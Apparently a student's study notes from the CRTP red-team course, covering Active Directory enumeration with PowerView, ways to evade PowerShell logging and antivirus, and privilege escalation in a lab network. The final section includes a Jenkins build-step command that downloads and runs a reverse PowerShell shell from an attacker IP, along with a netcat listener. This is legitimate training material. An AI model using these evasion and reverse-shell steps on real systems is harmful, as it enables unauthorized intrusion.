CRTP (Certified Red Team Professional)

HackingSkills
8 min readNov 15, 2023

{Session1}

The scope of the labs:-
172.16.1.0/24–127.16.17.0/24

Active Directory is a database used to store all information of the entire networks; users, computers, groups, trusts, policies, etc.

Active directory play a role n management, security, interoperability

Domains:- stores all AD objects’ accounts.

Domain Controllers:- responsible for authentication and authorization for domains.

AD components:-

there are a lot of components like LDAB, NetBIOS … but we focus in the following:-

  1. schema:
  2. query and index:
  3. global catalog:
  4. replication service:

Active Directory structure:

Active directory contains multiple domains either forest domain or tree domain, and each domain may contain multiple organization units.

forest domain vs tree domain

we will use PowerShell for the AD attacks because of the following:-

  • run script from the memory
  • integrated with .Net
  • it’s library not just an executable file so it’s exist in all windows.

PowerShell detections:

  • system wide transcription
  • script block logging
  • AntiMalware Scan Interface AMSI
  • Constrained Language mode with App locker and windows defender

there are thee languages modes:

  • full
  • constrained
  • zero

To check the language mode : $ExecutionContext.SessionState.LanguageMode

execution policy is not security measure and not security controls. it’s just to make sure no one do something accidently.

there are many ways to bypass it:

  • powershell ExecutionPolicy bypass
  • powershell -c …….
  • powershell -encodedcommand $env::PSExecutionPolicyPrefrence=”bypass”

we can bypass powershell security detections:-

we use invisishell to bypass logging.

invisishill triggers or hooks System.Management.Automation.dll and System.Core.dll using CLR profiler

CLR is common language runtime which i used to send and receive messages

two ways to run the invisishell:

  1. with admin privilege (is not recommended) by RunWithPathAsAdmin.bat
  2. without Admin privilege (is recommended) by RunWithRegistryNonAdmin.bat

to bypass AV on the disk and scan scripts to get the exact detected block we can use:

  1. AMSITrigger → AMSITrigger.exe -i {script_file}
  2. DefenderCheck → DefenderCheck.exe {script_file} (Hexa)

ways to fix the scripts:-

  1. renaming the file
  2. removing the comments
  3. renaming the variables
  4. reversing strings

To reverse string:-

the string is welcome

the script:-

$str = ‘emoclew’

//to read the str from right to left

$strrev = ([regex]::Matches($str, ’.’, ‘RightToLeft’) | ForEach {$_.value}) -join ‘ ’

We will use assume breach methodology which always acts like there are real enemies and try to detect them before they reach the important machines.

LAB ENVIRONMENT

Domain Enumeration//:

For domain Enumeration we can use:-(we should run it inside invisishell to bypass logging)

  1. powerview script
  2. active directory module

For powerview script:

  • C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
  • powershell
  • . C:\AD\Tools\PowerView.ps1
  • Get-Domain → get current domain information
  • Get-Domain -Domain {…} → get specific domain information
  • Get-DomainSID
  • Get-DaomainPolicyData
  • (Get-DomainPolicyData).systemaccess
  • Get-DomainController
  • Get-DomainUser → -Properties or select — to specify the fields , -Filter “field -like “*str*””, -LDAPFilter “field = *str*”
  • Get-DomainComputer → -ping
  • Get-DomainGroup
  • Get-DomainGroupMember
  • Get-NetLocalGroup {Admin priv}
  • Get-NetLocalGroupMember {Admin priv}
  • Get-NetLoggedon {Admin priv}
  • Get-LoggedonLocal {remote registry}
  • Get-LastLoggedOn

For Active directory module:

  • C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
  • Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
  • Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
  • Get-Command -Module {….}
  • Get-ADDomain → get current domain information
  • Get-ADDomain -Identity {…} → get specific domain information
  • Get-ADDomain.DomainSID
  • Get-ADDomainController
  • Get-ADUser → -Properties or select — to specify the fields , -Filter “field -like “*str*””
  • Get-ADComputer
  • Get-ADGroup
  • Get-ADGroupMember
  • Get-ADPrincipalGroupMembership

Scripts used to run script loaded in the memory or web server but I should first add them in them there..

Lab manual Learning Object 1 :-

run powerview:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

powershell

. C:\AD\Tools\PowerView.ps1

to list all users:

Get-DomainUser

Get-DomainUser | select -ExpandProperty samaccountname

to list all computers:

Get-DomainComputer | select -ExpandProperty dnshostname

to see the details of domain admin group:

Get-DomainGroup -Identity “Domain Admins”

to list the members of domain admin group:

Get-DomainGroupMember -Identity “Domain Admins”

to list the members of Enterprise admin group but it’s not in the rout domain:

Get-DomainGroupMember -Identity “Enterprise Admins” -Domain moneycorp.local

run active directory module:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll

Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

to list all users:

Get-ADUser -Filter *

Get-ADUser -Filter * -Properties *| select Samaccountname,Description

to list all computers:

Get-ADComputer -Filter *

to list the members of domain admin group:

Get-ADGroupMember -Identity ‘Domain Admins’

to list the members of Enterprise admin group but it’s not in the rout domain:

Get-ADGroupMember -Identity ‘Enterprise Admins’ -Server moneycorp.local

Group policy manages configurations and changes insecurity settings, registry policy settings and group policy preferences and software installation.

  • Get-DomainGPO → to get GPO , -ComputerIdentity → to specify computer name.
  • Get-DomainGPOLocalGroup
  • Get-DomainGPOComputerLocalGroupMapping → getting the users in local group.
  • Get-DomainOU/Get-ADOrganizationalUnit

End of Learning Object 2

Lab manual Learning Object 2 :-

list all the OU:

Get-DomainOU

Get-DomainOU | select -ExpandProperty name

list all the computers in the StudentsMachines OU:

(Get-DomainOU -Identity StudentMachines).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

list the GPOs:

Get-DomainGPO

enumerate GPO applied on the StudentMachines OU:

(Get-DomainOU -Identity StudentMachines).gplink {then coppy the number}

Get-DomainGPO -Identity ‘{7478F170–6A0C-490C-B355–9E4618BC785D}’

OR

Get-DomainGPO -Identity (Get-DomainOU -Identity StudentMachines).gplink.substring(11,(Get-DomainOU -Identity StudentMachines).gplink.length-72)

Access Control Model: control the process to access objects and other resources in AD based on access token and security descriptors

Access Control List → it is a list of access control entries (ACE) → list of objects and their permissions.

there are two types:-

  • DACL → defines the permissions trustees on an objects.
  • SACL → Logs success and failure audit messages when an object is accessed.
  • Get-DomainObjectAcl/ Get-Acl

End of Learning Object 3

Lab manual Learning Object 3:-

list all the ACL for the Domain Admins group:

Get-DomainObjectAcl -Identity “Domain Admins” -ResolveGUIDs -Verbose

to check for modify rights/permissions for the studentx:

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match “studentx”}

Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match “RDPUsers”}

End of Learning Object 3

Trusts can be :

  • one way trust — unidirectional
  • two way trust — bidirectional

it also can be:

  • transitive → can be extended to establish trust relationships with other domains (intra-forest domains in same forest)
  • nontransitive → can not be extended to establish trust relationships with other domains (external-forest domain in different forests)

the default/automatic trust:-

  • Parent-child trust
  • Tree-root trust

forest trust → is the trust between the root domain.

  • Get-DomainTrust/Get-ADTrust
  • Get-Forest/GetADForest
  • Get-DomainForest/Get-ADForest.Domain
  • Get-ForestGlobalCatelog
  • Get-ForestTrust/ Get-ADTrust -Filter ‘msOS-TrustForestTrustInfo -ne “$null”’

End of Learning Object 4

Lab manual Learning Object 4:-

tasks by powerview:

list all domains in the current forest:

Get-ForestDomain -Verbose

all the trusts of the dollarcorp domain:

Get-DomainTrust

list only the external trusts in the moneycorp.local forest:

Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name} | ?{$_.TrustAttributes -eq “FILTER_SIDS”}

To identify external trusts of the dollarcorp domain:

Get-DomainTrust | ?{$_.TrustAttributes -eq “FILTER_SIDS”}

list trusts for eurocorp.local forest:

Get-ForestDomain -Forest eurocorp.local | %{Get-DomainTrust -Domain $_.Name}

tasks by active directory module:

list all domains in the current forest:

(Get-ADForest).Domains

all the trusts of the dollarcorp domain:

Get-ADTrust -Filter *

list all the external trusts in the moneycorp.local forest:

Get-ADForest | %{Get-ADTrust -Filter *}

list only the external trusts in the moneycorp.local forest:

(Get-ADForest).Domains | %{Get-ADTrust -Filter ‘(intraForest -ne $True) -and (ForestTransitive -ne $True)’ -Server $_}

To identify external trusts of the dollarcorp domain:

Get-ADTrust -Filter ‘(intraForest -ne $True) -and (ForestTransitive -ne $True)’

list trusts for eurocorp.local forest:

Get-ADTrust -Filter * -Server eurocorp.local

Privilege Escalation//:

ways to escalate the privileges:

  • missing patches
  • automated deployment and auto logon with clear passwords
  • any user can run MSI as a system
  • misconfigured services
  • dll hijacking

tools that help us in escalate the privileges:-

  • PowerUp
  • Privesc
  • winPEAS

Abuse jenkins app

Lab manual Learning Object 5:-

run powerup:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

powershell

. C:\AD\Tools\PowerUp.ps1

check for any privilege escalation:

Invoke-AllChecks

exploit and escalate the privilege by using the findings:

Invoke-ServiceAbuse -Name ‘AbyssWebServer’ -UserName ‘dcorp\studentx’ -Verbose

identify a machine in the domain where studentx has local administrative:

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1

Find-PSRemotingLocalAdminAccess

connect to dcorp-adminsrv:

winrs -r:dcorp-adminsrv cmd

whoami

hostname

OR

Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local

[dcorp-adminsrv.dollarcorp.moneycorp.local]

whoami

hostname

Abusing Jenkins instance:

http://172.16.3.11:8080 by Edge

go to the “People” page

Jenkins does not have a password policy many users use username as passwords

the user builduser has password builduser. The user builduser can Configure builds and Add Build Steps which will help us in executing commands.

configuration → source code management

We renamed the function Invoke-PowerShellTcp to Power in the script to bypass Windows Defender.

the script Power -Reverse -IPAddress 172.16.100.X -Port 443

powershell.exe -c iex ((New-Object Net.WebClient).DownloadString(‘http://172.16.100.X/Invoke-PowerShellTcp.ps1'));Power -Reverse -IPAddress 172.16.100.X -Port 443

or

powershell.exe iex (iwr http://172.16.100.X/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.X -Port 443

save configuration

Remember to host the reverse shell on a local web server on your student VM. You can find hfs.exe in the C:\AD\Tools directory of your student VM. Also, make sure to add an exception or turn off the firewall on the student VM.

On the student VM:

C:\AD\Tools\netcat-win32–1.12\nc64.exe -lvp 443

On Jenkins web console, launch the Build by clicking on ‘Build Now’

then we will have the shell in the netcat.

End of Learning Object 5

End of module 1

Created On 15th, November 2023

Edited on 22ed, December 2023

--

--